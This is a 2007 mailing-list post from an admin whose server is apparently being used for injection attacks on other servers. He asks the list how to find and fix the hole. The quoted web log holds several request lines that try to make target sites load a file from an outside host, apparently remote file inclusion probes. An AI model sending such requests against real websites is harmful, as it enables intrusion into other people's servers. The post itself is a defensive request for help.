Hey list, Currently, we get some notice about some one is using our server doing injection attacks against other servers.
Below are some log files they sent to us $------------------Snap begin---------------------------$ our.server.ip.address - - [09/Jul/2007:00:31:43 +0200] "GET > //.comhttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7414 "-" > "Mozilla/5.0" > our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET > //.infohttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7415 > "-" "Mozilla/5.0" > our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET > //.brhttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7413 "-" > "Mozilla/5.0" $----------------snap end---------------------------------$ Unfortunately, the person who is in charge of server maintaining is away now and we can not get hold of him. Can any of you give me some direction on how to track down the security hole and eliminate it please? Thanks a lot in advance! Blessings, Rocky -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]